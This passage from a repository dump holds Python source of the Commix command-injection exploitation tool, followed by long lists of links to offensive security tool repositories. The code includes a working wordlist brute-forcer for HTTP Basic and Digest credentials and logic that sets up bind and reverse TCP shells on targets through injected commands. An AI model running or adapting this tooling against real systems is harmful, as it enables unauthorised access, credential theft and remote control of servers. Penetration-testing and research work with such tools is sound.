in request: 105 | request = request.replace("\\n","\n") 106 | request_url = re.findall(r"" + http_header + " (.*) ", request) 107 | 108 | if request_url: 109 | if not single_request: 110 | request_url = request_url[0] 111 | if http_header == "POST": 112 | # Check for POST Data. 113 | result = [item for item in request.splitlines() if item] 114 | menu.options.data = result[len(result)-1] 115 | else: 116 | try: 117 | # Check if url ends with "=". 118 | if request_url[0].endswith("="): 119 | request_url = request_url[0].replace("=","=" + settings.INJECT_TAG, 1) 120 | except IndexError: 121 | invalid_data(request_file, single_request) 122 | break 123 | 124 | # Check if invalid data 125 | if not request_url: 126 | invalid_data(request_file, single_request) 127 | else: 128 | request_url = "".join([str(i) for i in request_url]) 129 | 130 | # Check for other headers 131 | extra_headers = "" 132 | prefix = "http://" 133 | for line in request.splitlines(): 134 | if re.findall(r"Host: " + "(.*)", line): 135 | menu.options.host = "".join([str(i) for i in re.findall(r"Host: " + "(.*)", line)]) 136 | # User-Agent Header 137 | elif re.findall(r"User-Agent: " + "(.*)", line): 138 | menu.options.agent = "".join([str(i) for i in re.findall(r"User-Agent: " + "(.*)", line)]) 139 | # Cookie Header 140 | elif re.findall(r"Cookie: " + "(.*)", line): 141 | menu.options.cookie = "".join([str(i) for i in re.findall(r"Cookie: " + "(.*)", line)]) 142 | # Referer Header 143 | elif re.findall(r"Referer: " + "(.*)", line): 144 | menu.options.referer = "".join([str(i) for i in re.findall(r"Referer: " + "(.*)", line)]) 145 | if menu.options.referer and "https://" in menu.options.referer: 146 | prefix = "https://" 147 | elif re.findall(r"Authorization: " + "(.*)", line): 148 | auth_provided = "".join([str(i) for i in re.findall(r"Authorization: " + "(.*)", line)]).split() 149 | menu.options.auth_type = auth_provided[0].lower() 150 | if menu.options.auth_type == "basic": 151 | menu.options.auth_cred = base64.b64decode(auth_provided[1]) 152 | elif menu.options.auth_type == "digest": 153 | if not menu.options.auth_cred: 154 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 155 | err_msg = "Use the '--auth-cred' option to provide a valid pair of " 156 | err_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") " 157 | print settings.print_critical_msg(err_msg) 158 | sys.exit(0) 159 | 160 | # Add extra headers 161 | else: 162 | match = re.findall(r"(.*): (.*)", line) 163 | match = "".join([str(i) for i in match]).replace("', '",":") 164 | match = match.replace("('","") 165 | match = match.replace("')","\\n") 166 | # Ignore some header. 167 | if "Content-Length" or "Accept-Encoding" in match: 168 | extra_headers = extra_headers 169 | else: 170 | extra_headers = extra_headers + match 171 | 172 | # Extra headers 173 | menu.options.headers = extra_headers 174 | 175 | # Target URL 176 | if not menu.options.host: 177 | invalid_data(request_file, single_request) 178 | else: 179 | menu.options.url = prefix + menu.options.host + request_url 180 | if single_request: 181 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") 182 | sys.stdout.flush() 183 | if menu.options.logfile: 184 | info_msg = "Parsed target from '" + os.path.split(request_file)[1] + "' for tests :" 185 | print settings.print_info_msg(info_msg) 186 | print settings.SUB_CONTENT_SIGN + http_header + " " + prefix + menu.options.host + request_url 187 | if http_header == "POST": 188 | print settings.SUB_CONTENT_SIGN + "Data: " + menu.options.data 189 | #eof -------------------------------------------------------------------------------- /commix/src/core/requests/authentication.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import os 17 | import sys 18 | import time 19 | import base64 20 | import urllib2 21 | import cookielib 22 | 23 | from src.utils import menu 24 | from src.utils import settings 25 | from src.utils import session_handler 26 | 27 | from src.core.requests import tor 28 | from src.core.requests import proxy 29 | from src.core.requests import headers 30 | from src.core.requests import requests 31 | 32 | 33 | from src.core.injections.controller import checks 34 | from src.thirdparty.colorama import Fore, Back, Style, init 35 | 36 | """ 37 | If a dashboard or an administration panel is found (auth_url), 38 | do the authentication process using the provided credentials (auth_data). 39 | """ 40 | 41 | """ 42 | The authentication process 43 | """ 44 | def authentication_process(): 45 | 46 | auth_url = menu.options.auth_url 47 | auth_data = menu.options.auth_data 48 | cj = cookielib.CookieJar() 49 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) 50 | request = opener.open(urllib2.Request(auth_url)) 51 | 52 | cookies = "" 53 | for cookie in cj: 54 | cookie_values = cookie.name + "=" + cookie.value + "; " 55 | cookies += cookie_values 56 | 57 | if len(cookies) != 0 : 58 | menu.options.cookie = cookies.rstrip() 59 | if settings.VERBOSITY_LEVEL >= 1: 60 | success_msg = "The received cookie is " 61 | success_msg += menu.options.cookie + Style.RESET_ALL + "." 62 | print settings.print_success_msg(success_msg) 63 | 64 | urllib2.install_opener(opener) 65 | request = urllib2.Request(auth_url, auth_data) 66 | # Check if defined extra headers. 67 | headers.do_check(request) 68 | #headers.check_http_traffic(request) 69 | # Get the response of the request. 70 | response = requests.get_request_response(request) 71 | return response 72 | 73 | """ 74 | Define the HTTP authentication 75 | wordlists for usernames / passwords. 76 | """ 77 | def define_wordlists(): 78 | try: 79 | usernames = [] 80 | if not os.path.isfile(settings.USERNAMES_TXT_FILE): 81 | err_msg = "The username file (" + settings.USERNAMES_TXT_FILE + ") is not found" 82 | print settings.print_critical_msg(err_msg) 83 | sys.exit(0) 84 | if len(settings.USERNAMES_TXT_FILE) == 0: 85 | err_msg = "The " + settings.USERNAMES_TXT_FILE + " file is empty." 86 | print settings.print_critical_msg(err_msg) 87 | sys.exit(0) 88 | with open(settings.USERNAMES_TXT_FILE, "r") as f: 89 | for line in f: 90 | line = line.strip() 91 | usernames.append(line) 92 | except IOError: 93 | err_msg = " Check if the " + settings.USERNAMES_TXT_FILE + " file is readable or corrupted." 94 | print settings.print_critical_msg(err_msg) 95 | sys.exit(0) 96 | 97 | try: 98 | passwords = [] 99 | if not os.path.isfile(settings.PASSWORDS_TXT_FILE): 100 | err_msg = "The password file (" + settings.PASSWORDS_TXT_FILE + ") is not found" + Style.RESET_ALL 101 | print settings.print_critical_msg(err_msg) 102 | sys.exit(0) 103 | if len(settings.PASSWORDS_TXT_FILE) == 0: 104 | err_msg = "The " + settings.PASSWORDS_TXT_FILE + " file is empty." 105 | print settings.print_critical_msg(err_msg) 106 | sys.exit(0) 107 | with open(settings.PASSWORDS_TXT_FILE, "r") as f: 108 | for line in f: 109 | line = line.strip() 110 | passwords.append(line) 111 | except IOError: 112 | err_msg = " Check if the " + settings.PASSWORDS_TXT_FILE + " file is readable or corrupted." 113 | print settings.print_critical_msg(err_msg) 114 | sys.exit(0) 115 | 116 | return usernames, passwords 117 | 118 | """ 119 | Simple Basic / Digest HTTP authentication cracker. 120 | """ 121 | def http_auth_cracker(url, realm): 122 | # Define the HTTP authentication type. 123 | authentication_type = menu.options.auth_type 124 | # Define the authentication wordlists for usernames / passwords. 125 | usernames, passwords = define_wordlists() 126 | i = 1 127 | found = False 128 | total = len(usernames) * len(passwords) 129 | for username in usernames: 130 | for password in passwords: 131 | float_percent = "{0:.1f}%".format(round(((i*100)/(total*1.0)),2)) 132 | # Check if verbose mode on 133 | if settings.VERBOSITY_LEVEL >= 1: 134 | payload = "pair of credentials '" + username + ":" + password + "'" 135 | if settings.VERBOSITY_LEVEL > 1: 136 | print settings.print_checking_msg(payload) 137 | else: 138 | sys.stdout.write("\r" + settings.print_checking_msg(payload) + " ") 139 | sys.stdout.flush() 140 | try: 141 | # Basic authentication 142 | if authentication_type.lower() == "basic": 143 | request = urllib2.Request(url) 144 | base64string = base64.encodestring(username + ":" + password)[:-1] 145 | request.add_header("Authorization", "Basic " + base64string) 146 | headers.do_check(request) 147 | headers.check_http_traffic(request) 148 | result = urllib2.urlopen(request) 149 | # Digest authentication 150 | elif authentication_type.lower() == "digest": 151 | authhandler = urllib2.HTTPDigestAuthHandler() 152 | authhandler.add_password(realm, url, username, password) 153 | opener = urllib2.build_opener(authhandler) 154 | urllib2.install_opener(opener) 155 | request = urllib2.Request(url) 156 | headers.check_http_traffic(request) 157 | result = urllib2.urlopen(request) 158 | 159 | # Store valid results to session 160 | admin_panel = url 161 | session_handler.import_valid_credentials(url, authentication_type, admin_panel, username, password) 162 | found = True 163 | except KeyboardInterrupt : 164 | raise 165 | except: 166 | pass 167 | if found: 168 | if not settings.VERBOSITY_LEVEL >= 1: 169 | float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL 170 | else: 171 | if str(float_percent) == "100.0%": 172 | if not settings.VERBOSITY_LEVEL >= 1: 173 | float_percent = Fore.RED + "FAILED" + Style.RESET_ALL 174 | else: 175 | i = i + 1 176 | if not settings.VERBOSITY_LEVEL >= 1: 177 | info_msg = "Checking for a valid pair of credentials... [ " + float_percent + " ]" 178 | sys.stdout.write("\r\r" + settings.print_info_msg(info_msg)) 179 | sys.stdout.flush() 180 | if found: 181 | valid_pair = "" + username + ":" + password + "" 182 | print "" 183 | success_msg = "Identified a valid pair of credentials '" 184 | success_msg += valid_pair + Style.RESET_ALL + Style.BRIGHT + "'." 185 | print settings.print_success_msg(success_msg) 186 | return valid_pair 187 | 188 | err_msg = "Use the '--auth-cred' option to provide a valid pair of " 189 | err_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") " 190 | err_msg += "or place an other dictionary into '" 191 | err_msg += os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/' directory." 192 | print "\n" + settings.print_critical_msg(err_msg) 193 | return False 194 | 195 | #eof -------------------------------------------------------------------------------- /commix/src/core/injections/controller/shell_options.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import re 17 | import os 18 | import sys 19 | import time 20 | import urllib 21 | import urlparse 22 | 23 | from src.utils import menu 24 | from src.utils import settings 25 | 26 | from src.core.injections.controller import checks 27 | from src.thirdparty.colorama import Fore, Back, Style, init 28 | 29 | from src.core.shells import bind_tcp 30 | from src.core.shells import reverse_tcp 31 | from src.core.injections.results_based.techniques.classic import cb_injector 32 | from src.core.injections.results_based.techniques.eval_based import eb_injector 33 | 34 | """ 35 | Check for established connection 36 | """ 37 | def check_established_connection(): 38 | while True: 39 | if settings.VERBOSITY_LEVEL == 1: 40 | print "" 41 | warn_msg = "Something went wrong with the reverse TCP connection." 42 | warn_msg += " Please wait while checking state." 43 | print settings.print_warning_msg(warn_msg) 44 | time.sleep(10) 45 | lines = os.popen('netstat -anta').read().split("\n") 46 | found = False 47 | for line in lines: 48 | if "ESTABLISHED" in line and settings.LPORT in line.split(): 49 | found = True 50 | pass 51 | if not found: 52 | return 53 | 54 | """ 55 | Execute the bind / reverse TCP shell 56 | """ 57 | def execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option): 58 | if settings.EVAL_BASED_STATE != False: 59 | # Command execution results. 60 | start = time.time() 61 | response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) 62 | end = time.time() 63 | diff = end - start 64 | # Evaluate injection results. 65 | shell = eb_injector.injection_results(response, TAG, cmd) 66 | else: 67 | whitespace = settings.WHITESPACE[0] 68 | if whitespace == " ": 69 | whitespace = urllib.quote(whitespace) 70 | # Command execution results. 71 | start = time.time() 72 | response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) 73 | end = time.time() 74 | diff = end - start 75 | # Evaluate injection results. 76 | shell = cb_injector.injection_results(response, TAG, cmd) 77 | 78 | if settings.REVERSE_TCP and (int(diff) > 0 and int(diff) < 6): 79 | check_established_connection() 80 | else: 81 | if settings.VERBOSITY_LEVEL == 1: 82 | print "" 83 | 84 | err_msg = "The " + os_shell_option.split("_")[0] + " " 85 | err_msg += os_shell_option.split("_")[1].upper() + " connection has failed!" 86 | print settings.print_critical_msg(err_msg) 87 | 88 | """ 89 | Configure the bind TCP shell 90 | """ 91 | def bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again): 92 | settings.BIND_TCP = True 93 | # Set up RHOST / LPORT for the bind TCP connection. 94 | bind_tcp.configure_bind_tcp() 95 | if settings.BIND_TCP == False: 96 | if settings.REVERSE_TCP == True: 97 | os_shell_option = "reverse_tcp" 98 | reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) 99 | return go_back, go_back_again 100 | 101 | while True: 102 | if settings.RHOST and settings.LPORT in settings.SHELL_OPTIONS: 103 | result = checks.check_bind_tcp_options(settings.RHOST) 104 | else: 105 | cmd = bind_tcp.bind_tcp_options() 106 | result = checks.check_bind_tcp_options(cmd) 107 | if result != None: 108 | if result == 0: 109 | go_back_again = False 110 | elif result == 1 or result == 2: 111 | go_back_again = True 112 | settings.BIND_TCP = False 113 | elif result == 3: 114 | settings.BIND_TCP = False 115 | reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) 116 | return go_back, go_back_again 117 | 118 | # execute bind TCP shell 119 | execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option) 120 | 121 | """ 122 | Configure the reverse TCP shell 123 | """ 124 | def reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again): 125 | settings.REVERSE_TCP = True 126 | # Set up LHOST / LPORT for the reverse TCP connection. 127 | reverse_tcp.configure_reverse_tcp() 128 | if settings.REVERSE_TCP == False: 129 | if settings.BIND_TCP == True: 130 | os_shell_option = "bind_tcp" 131 | bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) 132 | return go_back, go_back_again 133 | 134 | while True: 135 | if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: 136 | result = checks.check_reverse_tcp_options(settings.LHOST) 137 | else: 138 | cmd = reverse_tcp.reverse_tcp_options() 139 | result = checks.check_reverse_tcp_options(cmd) 140 | if result != None: 141 | if result == 0: 142 | go_back_again = False 143 | elif result == 1 or result == 2: 144 | go_back_again = True 145 | settings.REVERSE_TCP = False 146 | elif result == 3: 147 | settings.REVERSE_TCP = False 148 | bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) 149 | #reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) 150 | return go_back, go_back_again 151 | 152 | # execute reverse TCP shell 153 | execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option) 154 | 155 | """ 156 | Check commix shell options 157 | """ 158 | def check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again): 159 | os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) 160 | 161 | if os_shell_option == "back" or os_shell_option == True or os_shell_option == False: 162 | go_back = True 163 | if os_shell_option == False: 164 | go_back_again = True 165 | return go_back, go_back_again 166 | 167 | # The "os_shell" option 168 | elif os_shell_option == "os_shell": 169 | warn_msg = "You are already into the '" + os_shell_option + "' mode." 170 | print settings.print_warning_msg(warn_msg) 171 | return go_back, go_back_again 172 | 173 | # The "bind_tcp" option 174 | elif os_shell_option == "bind_tcp": 175 | go_back, go_back_again = bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) 176 | return go_back, go_back_again 177 | 178 | # The "reverse_tcp" option 179 | elif os_shell_option == "reverse_tcp": 180 | go_back, go_back_again = reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) 181 | return go_back, go_back_again 182 | 183 | # The "quit" option 184 | elif os_shell_option == "quit": 185 | sys.exit(0) 186 | 187 | else: 188 | return go_back, go_back_again 189 | 190 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/list.txt: -------------------------------------------------------------------------------- 1 | git://git.kali.org/packages/ace-voip.git 2 | git://git.kali.org/packages/amap.git 3 | git://git.kali.org/packages/cisco-auditing-tool.git 4 | git://git.kali.org/packages/cisco-global-exploiter.git 5 | git://git.kali.org/packages/cisco-ocs.git 6 | git://git.kali.org/packages/cisco-torch.git 7 | https://bitbucket.org/LaNMaSteR53/recon-ng 8 | https://github.com/0xd4d/dnSpy 9 | https://github.com/1aN0rmus/TekDefense-Automater 10 | https://github.com/1N3/Findsploit 11 | https://github.com/1N3/Sn1per 12 | https://github.com/4shadoww/hakkuframework 13 | https://github.com/adaptivethreat/Empire 14 | https://github.com/AeonDave/doork 15 | https://github.com/aircrack-ng/aircrack-ng 16 | https://github.com/ajinabraham/Mobile-Security-Framework-MobSF 17 | https://github.com/AlisamTechnology/ATSCAN 18 | https://github.com/allfro/sploitego 19 | https://github.com/andresriancho/w3af 20 | https://github.com/aol/moloch 21 | https://github.com/appknox/AFE 22 | https://github.com/Arachni/arachni 23 | https://github.com/Aralhach/bashobfus 24 | https://github.com/b3mb4m/shellsploit-framework 25 | https://github.com/bartobri/no-more-secrets 26 | https://github.com/beefproject/beef 27 | https://github.com/BlackArch/rainbowcrack 28 | https://github.com/blindfuzzy/LHF 29 | https://github.com/bounteous/libenom 30 | https://github.com/BRDumps/extract-hashes 31 | https://github.com/BreakingMalwareResearch/atom-bombing 32 | https://github.com/byt3bl33d3r/chrome-decrypter 33 | https://github.com/byt3bl33d3r/pth-toolkit 34 | https://github.com/certsocietegenerale/FIR 35 | https://github.com/certtools/intelmq 36 | https://github.com/Cewlt/SkypeMass 37 | https://github.com/chaitin/sqlchop 38 | https://github.com/chinoogawa/fbht 39 | https://github.com/cloughrm/Pastebin-Scraper 40 | https://github.com/commixproject/commix 41 | https://github.com/cxdy/pybomber 42 | https://github.com/D35m0nd142/Kadabra 43 | https://github.com/danielmiessler/SecLists 44 | https://github.com/DanMcInerney/shellshock-hunter 45 | https://github.com/DanMcInerney/shellshock-hunter-google 46 | https://github.com/DanMcInerney/wifijammer 47 | https://github.com/darkoperator/dnsrecon 48 | https://github.com/ddos-defense/bohatei 49 | https://github.com/desaster/kippo 50 | https://github.com/devttys0/binwalk 51 | https://github.com/digininja/CeWL 52 | https://github.com/Dionach/CMSmap 53 | https://github.com/dloss/python-pentest-tools 54 | https://github.com/DoddyHackman/Arsenal_X 55 | https://github.com/DominikSchlecht/pyDirBuster 56 | https://github.com/dotfighter/torshammer 57 | https://github.com/dripcap/dripcap 58 | https://github.com/EgeBalci/The-Eye 59 | https://github.com/EnableSecurity/wafw00f 60 | https://github.com/endgameinc/binarypig 61 | https://github.com/epinna/weevely3 62 | https://github.com/Ettercap/ettercap 63 | https://github.com/evilsocket/bettercap 64 | https://github.com/ex0dus-0x/brut3k1t 65 | https://github.com/ex0dus-0x/dedsploit 66 | https://github.com/fgeek/pyfiscan 67 | https://github.com/foospidy/HoneyPy 68 | https://github.com/frdmn/findmyhash 69 | https://github.com/g0tmi1k/mpc 70 | https://github.com/gabrielrcouto/reaver-wps 71 | https://github.com/Gallopsled/pwntools 72 | https://github.com/gamelinux/passivedns 73 | https://github.com/GDSSecurity/Windows-Exploit-Suggester 74 | https://github.com/georgiaw/Smartphone-Pentest-Framework 75 | https://github.com/google/grr 76 | https://github.com/google/rowhammer-test 77 | https://github.com/google/stenographer 78 | https://github.com/googleinurl/SCANNER-INURLBR 79 | https://github.com/GouveaHeitor/nipe 80 | https://github.com/graniet/chromebackdoor 81 | https://github.com/HackerOrientado/BypassCF 82 | https://github.com/hahwul/droid-hunter 83 | https://github.com/hashcat/hashcat 84 | https://github.com/hatRiot/clusterd 85 | https://github.com/hatRiot/zarp 86 | https://github.com/hellman/xortool 87 | https://github.com/HiroshiManRise/anonym8 88 | https://github.com/Hood3dRob1n/BinGoo 89 | https://github.com/huntergregal/scansploit 90 | https://github.com/hvqzao/liffy 91 | https://github.com/Hypsurus/weeman 92 | https://github.com/infobyte/evilgrade 93 | https://github.com/j91321/rext 94 | https://github.com/jaromil/HasciiCam 95 | https://github.com/jh00nbr/Routerhunter-2.0 96 | https://github.com/JoeDog/siege 97 | https://github.com/JohnTroony/php-webshells 98 | https://github.com/JPaulMora/Pyrit 99 | https://github.com/jsvine/waybackpack 100 | https://github.com/juansacco/exploitpack 101 | https://github.com/Jumpst3r/AsciiToDucky 102 | https://github.com/k4m4/onioff 103 | https://github.com/kevthehermit/dc-toolkit 104 | https://github.com/kevthehermit/RATDecoders 105 | https://github.com/knownsec/Pocsuite 106 | https://github.com/korczis/foremost 107 | https://github.com/kurobeats/fimap 108 | https://github.com/lanjelot/patator 109 | https://github.com/leebaird/discover 110 | https://github.com/lhr0909/PythonObfuscator 111 | https://github.com/liftoff/pyminifier 112 | https://github.com/lightbulb-framework/lightbulb-framework 113 | https://github.com/luisgg/ophcrack 114 | https://github.com/m0nad/HellRaiser/ 115 | https://github.com/m3pt0r/l0l 116 | https://github.com/magnumripper/JohnTheRipper 117 | https://github.com/marshyski/sshwatch 118 | https://github.com/merculite/BLE-Security 119 | https://github.com/micahflee/onionshare 120 | https://github.com/mikeryan/crackle 121 | https://github.com/misterch0c/malSploitBase 122 | https://github.com/mitmproxy/mitmproxy 123 | https://github.com/mthbernardes/EvilTool 124 | https://github.com/nbs-system/naxsi 125 | https://github.com/nmap/nmap 126 | https://github.com/NORMA-Inc/AtEar 127 | https://github.com/OsandaMalith/LFiFreak/ 128 | https://github.com/P0cL4bs/Kadimus 129 | https://github.com/ParrotSec/car-hacking-tools 130 | https://github.com/PenturaLabs/Linux_Exploit_Suggester 131 | https://github.com/praetorian-inc/Hob0Rules 132 | https://github.com/psypanda/hashID 133 | https://github.com/r00t-3xp10it/morpheus 134 | https://github.com/radare/radare2 135 | https://github.com/rafael-santiago/pig 136 | https://github.com/ReclaimYourPrivacy/eschalot 137 | https://github.com/reverse-shell/routersploit 138 | https://github.com/reyammer/shellnoob 139 | https://github.com/rezasp/joomscan 140 | https://github.com/rezasp/vbscan 141 | https://github.com/rfunix/Pompem 142 | https://github.com/rsmudge/armitage 143 | https://github.com/s3inlc/holm 144 | https://github.com/SafeStack/ava 145 | https://github.com/SageHack/cloud-buster 146 | https://github.com/SageHack/cloudflare-resolver 147 | https://github.com/samratashok/Kautilya 148 | https://github.com/samratashok/nishang 149 | https://github.com/savio-code/ghost-phisher 150 | https://github.com/Screetsec/Brutal 151 | https://github.com/Screetsec/Dracnmap 152 | https://github.com/Screetsec/TheFatRat 153 | https://github.com/SECFORCE/sparta 154 | https://github.com/secretsquirrel/the-backdoor-factory/ 155 | https://github.com/securestate/termineter 156 | https://github.com/seifreed/dirb 157 | https://github.com/sensepost/DET 158 | https://github.com/sensepost/kwetza 159 | https://github.com/sensepost/xrdp 160 | https://github.com/shawarkhanethicalhacker/D-TECT 161 | https://github.com/simsong/tcpflow 162 | https://github.com/sleuthkit/autopsy 163 | https://github.com/sleuthkit/sleuthkit 164 | https://github.com/sophron/wifiphisher 165 | https://github.com/SpiderLabs/jboss-autopwn 166 | https://github.com/suraj-root/spade 167 | https://github.com/tcstool/fireaway 168 | https://github.com/tcstool/NoSQLMap 169 | https://github.com/TheRook/subbrute 170 | https://github.com/thesp0nge/dawnscanner 171 | https://github.com/timwr/CVE-2016-5195 172 | https://github.com/tnich/honssh 173 | https://github.com/tomac/yersinia 174 | https://github.com/trustedsec/ptf 175 | https://github.com/TryCatchHCF/Cloakify 176 | https://github.com/ufrisk/pcileech 177 | https://github.com/urbanadventurer/WhatWeb 178 | https://github.com/USArmyResearchLab/Dshell 179 | https://github.com/v3n0m-Scanner/V3n0M-Scanner 180 | https://github.com/vk496/linset 181 | https://github.com/volatilityfoundation/volatility 182 | https://github.com/vusec/drammer 183 | https://github.com/vvalien/SharpMeter 184 | https://github.com/WhiteMatt3r/Skype-Tool 185 | https://github.com/wi-fi-analyzer/mdk3-master 186 | https://github.com/wick2o/gitdigger 187 | https://github.com/wiire/pixiewps 188 | https://github.com/wireghoul/dotdotpwn 189 | https://github.com/wpscanteam/wpscan 190 | https://github.com/x3omdax/PenBox 191 | https://github.com/yaph/domxssscanner 192 | https://github.com/ysrc/F-Scrack 193 | https://github.com/zennro/fbht-linux 194 | https://github.com/zeroq/amun 195 | https://github.com/zscproject/OWASP-ZSC 196 | https://www.kismetwireless.net/kismet.git 197 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/download-tools-hacking/list.txt: -------------------------------------------------------------------------------- 1 | git://git.kali.org/packages/ace-voip.git 2 | git://git.kali.org/packages/amap.git 3 | git://git.kali.org/packages/cisco-auditing-tool.git 4 | git://git.kali.org/packages/cisco-global-exploiter.git 5 | git://git.kali.org/packages/cisco-ocs.git 6 | git://git.kali.org/packages/cisco-torch.git 7 | https://bitbucket.org/LaNMaSteR53/recon-ng 8 | https://github.com/0xd4d/dnSpy 9 | https://github.com/1aN0rmus/TekDefense-Automater 10 | https://github.com/1N3/Findsploit 11 | https://github.com/1N3/Sn1per 12 | https://github.com/4shadoww/hakkuframework 13 | https://github.com/adaptivethreat/Empire 14 | https://github.com/AeonDave/doork 15 | https://github.com/aircrack-ng/aircrack-ng 16 | https://github.com/ajinabraham/Mobile-Security-Framework-MobSF 17 | https://github.com/AlisamTechnology/ATSCAN 18 | https://github.com/allfro/sploitego 19 | https://github.com/andresriancho/w3af 20 | https://github.com/aol/moloch 21 | https://github.com/appknox/AFE 22 | https://github.com/Arachni/arachni 23 | https://github.com/Aralhach/bashobfus 24 | https://github.com/b3mb4m/shellsploit-framework 25 | https://github.com/bartobri/no-more-secrets 26 | https://github.com/beefproject/beef 27 | https://github.com/BlackArch/rainbowcrack 28 | https://github.com/blindfuzzy/LHF 29 | https://github.com/bounteous/libenom 30 | https://github.com/BRDumps/extract-hashes 31 | https://github.com/BreakingMalwareResearch/atom-bombing 32 | https://github.com/byt3bl33d3r/chrome-decrypter 33 | https://github.com/byt3bl33d3r/pth-toolkit 34 | https://github.com/certsocietegenerale/FIR 35 | https://github.com/certtools/intelmq 36 | https://github.com/Cewlt/SkypeMass 37 | https://github.com/chaitin/sqlchop 38 | https://github.com/chinoogawa/fbht 39 | https://github.com/cloughrm/Pastebin-Scraper 40 | https://github.com/commixproject/commix 41 | https://github.com/cxdy/pybomber 42 | https://github.com/D35m0nd142/Kadabra 43 | https://github.com/danielmiessler/SecLists 44 | https://github.com/DanMcInerney/shellshock-hunter 45 | https://github.com/DanMcInerney/shellshock-hunter-google 46 | https://github.com/DanMcInerney/wifijammer 47 | https://github.com/darkoperator/dnsrecon 48 | https://github.com/ddos-defense/bohatei 49 | https://github.com/desaster/kippo 50 | https://github.com/devttys0/binwalk 51 | https://github.com/digininja/CeWL 52 | https://github.com/Dionach/CMSmap 53 | https://github.com/dloss/python-pentest-tools 54 | https://github.com/DoddyHackman/Arsenal_X 55 | https://github.com/DominikSchlecht/pyDirBuster 56 | https://github.com/dotfighter/torshammer 57 | https://github.com/dripcap/dripcap 58 | https://github.com/EgeBalci/The-Eye 59 | https://github.com/EnableSecurity/wafw00f 60 | https://github.com/endgameinc/binarypig 61 | https://github.com/epinna/weevely3 62 | https://github.com/Ettercap/ettercap 63 | https://github.com/evilsocket/bettercap 64 | https://github.com/ex0dus-0x/brut3k1t 65 | https://github.com/ex0dus-0x/dedsploit 66 | https://github.com/fgeek/pyfiscan 67 | https://github.com/foospidy/HoneyPy 68 | https://github.com/frdmn/findmyhash 69 | https://github.com/g0tmi1k/mpc 70 | https://github.com/gabrielrcouto/reaver-wps 71 | https://github.com/Gallopsled/pwntools 72 | https://github.com/gamelinux/passivedns 73 | https://github.com/GDSSecurity/Windows-Exploit-Suggester 74 | https://github.com/georgiaw/Smartphone-Pentest-Framework 75 | https://github.com/google/grr 76 | https://github.com/google/rowhammer-test 77 | https://github.com/google/stenographer 78 | https://github.com/googleinurl/SCANNER-INURLBR 79 | https://github.com/GouveaHeitor/nipe 80 | https://github.com/graniet/chromebackdoor 81 | https://github.com/HackerOrientado/BypassCF 82 | https://github.com/hahwul/droid-hunter 83 | https://github.com/hashcat/hashcat 84 | https://github.com/hatRiot/clusterd 85 | https://github.com/hatRiot/zarp 86 | https://github.com/hellman/xortool 87 | https://github.com/HiroshiManRise/anonym8 88 | https://github.com/Hood3dRob1n/BinGoo 89 | https://github.com/huntergregal/scansploit 90 | https://github.com/hvqzao/liffy 91 | https://github.com/Hypsurus/weeman 92 | https://github.com/infobyte/evilgrade 93 | https://github.com/j91321/rext 94 | https://github.com/jaromil/HasciiCam 95 | https://github.com/jh00nbr/Routerhunter-2.0 